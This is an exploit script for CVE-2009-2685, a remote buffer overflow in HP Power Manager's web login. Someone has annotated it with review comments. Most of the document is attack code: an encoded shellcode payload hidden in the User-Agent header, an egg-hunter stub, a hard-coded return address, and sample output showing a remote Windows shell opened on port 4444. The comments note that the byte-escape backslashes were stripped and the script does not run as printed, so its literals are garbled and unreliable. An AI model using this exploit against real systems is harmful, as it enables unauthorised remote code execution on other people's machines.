
# Title : HP Power Manager Administration Universal Buffer Overflow Exploit
# Published : 2009-11-16
# Author : Matteo Memelli


#!/usr/bin/python
# HP Power Manager Administration Universal Buffer Overflow Exploit
# CVE 2009-2685
# Tested on Win2k3 Ent SP2 English, Win XP Sp2 English
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 07/11/2009
#
# ryujin@bt:~$ ./hppowermanager.py 172.16.30.203
# HP Power Manager Administration Universal Buffer Overflow Exploit
# ryujin __A-T__ offensive-security.com
# [+] Sending evil buffer...
# HTTP/1.0 200 OK
# [+] Done!
# [*] Check your shell at 172.16.30.203:4444 , can take up to 1 min to spawn your shell
# ryujin@bt:~$ nc -v 172.16.30.203 4444
# 172.16.30.203: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [172.16.30.203] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.

# C:\WINDOWS\system32>

import sys
from socket import *

# Proof-of-concept for CVE-2009-2685 (see header): a single crafted HTTP POST to the
# HP Power Manager login form.  Python 2 (print statements); not a function, so the
# whole script runs top to bottom on import.
#
# NOTE(review): the backslashes of the byte-escape sequences ("x41", "xCF", ...) and
# of the "rn" line terminators appear to have been stripped when this page was
# extracted, so the literals as printed are not the bytes the header comments describe
# and the script is not runnable as shown.  The comments below describe the intended
# structure only.
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"

# Target host is the only command-line argument; print usage and stop if it is absent.
try:
   HOST  = sys.argv[1]
except IndexError:
   print "Usage: %s HOST" % sys.argv[0]
   sys.exit()

PORT  = 80
# Value written over the saved return address; the author attributes it to a
# JMP ESP in MSVCP60.dll.  Presumably a fixed, non-randomised module address is
# what makes the exploit "universal" across the two Windows builds listed in the
# header -- inferred from the title, not verified here.
RET   = "xCFxBCx08x76" # 7608BCCF JMP ESP MSVCP60.dll

# Payload that ends up in the User-Agent header (see the `evil % (...)` mapping
# below).  The author's comment says it is Metasploit PexAlphaNum-encoded and
# 709 bytes long, avoiding the listed bad characters; it is prefixed with the
# 8-byte tag "n00bn00b".
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "x00x3ax26x3fx25x23x20x0ax0dx2fx2bx0bx5cx3dx3bx2dx2cx2ex24x25x1a"
SHELL = (
"n00bn00b"
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e"
"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx38"
"x4ex56x46x32x46x42x4bx58x45x34x4ex33x4bx48x4ex47"
"x45x30x4ax37x41x50x4fx4ex4bx38x4fx34x4ax51x4bx38"
"x4fx35x42x32x41x50x4bx4ex49x54x4bx48x46x33x4bx58"
"x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x37x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x4ax52x45x47x45x4ex4bx58"
"x4fx55x46x52x41x50x4bx4ex48x46x4bx58x4ex50x4bx54"
"x4bx58x4fx55x4ex31x41x30x4bx4ex43x50x4ex42x4bx48"
"x49x38x4ex36x46x52x4ex31x41x46x43x4cx41x43x4bx4d"
"x46x46x4bx38x43x54x42x33x4bx38x42x54x4ex30x4bx48"
"x42x37x4ex31x4dx4ax4bx48x42x34x4ax30x50x35x4ax46"
"x50x48x50x34x50x50x4ex4ex42x45x4fx4fx48x4dx48x56"
"x43x45x48x46x4ax36x43x43x44x33x4ax46x47x47x43x57"
"x44x33x4fx55x46x45x4fx4fx42x4dx4ax56x4bx4cx4dx4e"
"x4ex4fx4bx33x42x45x4fx4fx48x4dx4fx55x49x38x45x4e"
"x48x36x41x38x4dx4ex4ax30x44x50x45x35x4cx56x44x50"
"x4fx4fx42x4dx4ax36x49x4dx49x50x45x4fx4dx4ax47x35"
"x4fx4fx48x4dx43x55x43x55x43x35x43x45x43x35x43x34"
"x43x35x43x54x43x45x4fx4fx42x4dx48x46x4ax46x41x41"
"x4ex35x48x46x43x55x49x58x41x4ex45x39x4ax36x46x4a"
"x4cx31x42x47x47x4cx47x35x4fx4fx48x4dx4cx46x42x51"
"x41x35x45x55x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x42"
"x49x4ex47x45x4fx4fx48x4dx43x55x45x55x4fx4fx42x4d"
"x4ax56x45x4ex49x54x48x58x49x54x47x45x4fx4fx48x4d"
"x42x55x46x45x46x45x45x35x4fx4fx42x4dx43x59x4ax46"
"x47x4ex49x57x48x4cx49x47x47x55x4fx4fx48x4dx45x35"
"x4fx4fx42x4dx48x46x4cx36x46x56x48x56x4ax46x43x36"
"x4dx46x49x58x45x4ex4cx56x42x55x49x35x49x52x4ex4c"
"x49x58x47x4ex4cx56x46x54x49x38x44x4ex41x43x42x4c"
"x43x4fx4cx4ax50x4fx44x34x4dx32x50x4fx44x34x4ex42"
"x43x59x4dx38x4cx57x4ax33x4bx4ax4bx4ax4bx4ax4ax56"
"x44x57x50x4fx43x4bx48x51x4fx4fx45x47x46x34x4fx4f"
"x48x4dx4bx35x47x45x44x35x41x55x41x45x41x35x4cx56"
"x41x30x41x55x41x45x45x35x41x35x4fx4fx42x4dx4ax56"
"x4dx4ax49x4dx45x50x50x4cx43x35x4fx4fx48x4dx4cx36"
"x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx58x47x45x4ex4f"
"x43x58x46x4cx46x46x4fx4fx48x4dx44x45x4fx4fx42x4d"
"x4ax36x4fx4ex50x4cx42x4ex42x56x43x45x4fx4fx48x4d"
"x4fx4fx42x4dx5a")

# Short stub placed after the NOP run in the overflowed field.  It embeds the same
# four-byte tag "n00b" (x6e x30 x30 x62) that prefixes SHELL, so it is presumably an
# egg-hunting stub that locates the User-Agent payload elsewhere in memory -- which
# would also explain the "can take up to 1 min" note printed at the end.  Assumed
# from the tag match, not verified here.
EH ='x33xD2x90x90x90x42x52x6a'
EH +='x02x58xcdx2ex3cx05x5ax74'
EH +='xf4xb8x6ex30x30x62x8bxfa'
EH +='xafx75xeaxafx75xe7xffxe7'

# Raw HTTP request, assembled by hand rather than with an HTTP library.
# The four %s slots are filled, in order, with HOST, HOST, SHELL, HOST below.
evil =  "POST http://%s/goform/formLogin HTTP/1.1rn"
evil += "Host: %srn"
evil += "User-Agent: %srn"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
evil += "Accept-Language: en-us,en;q=0.5rn"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
evil += "Keep-Alive: 300rn"
evil += "Proxy-Connection: keep-alivern"
evil += "Referer: http://%s/index.asprn"
evil += "Content-Type: application/x-www-form-urlencodedrn"
# Hard-coded body length; it must match the form body assembled on the next two lines.
evil += "Content-Length: 678rnrnrn"[:len("Content-Length: 678rnrn")] if False else "Content-Length: 678rnrn"
# The overflow lives in the Login form field: the credential value "admin" is followed
# by 256 filler bytes, RET, a 32-byte NOP run, EH, 287 more filler bytes and CRLF.
# From a detection standpoint the observable is a POST to /goform/formLogin whose
# Login parameter is several hundred bytes long; the fix reference is the CVE in
# the header.
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "x41"*256 + RET + "x90"*32 + EH + "x42"*287 + "x0dx0a"
evil = evil % (HOST,HOST,SHELL,HOST)

# Plain TCP connection to HOST:80; the request is sent in one send() and only the
# first 1024 bytes of the response are read and printed (the header shows
# "HTTP/1.0 200 OK").  The socket is not closed if connect() or send() raises.
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()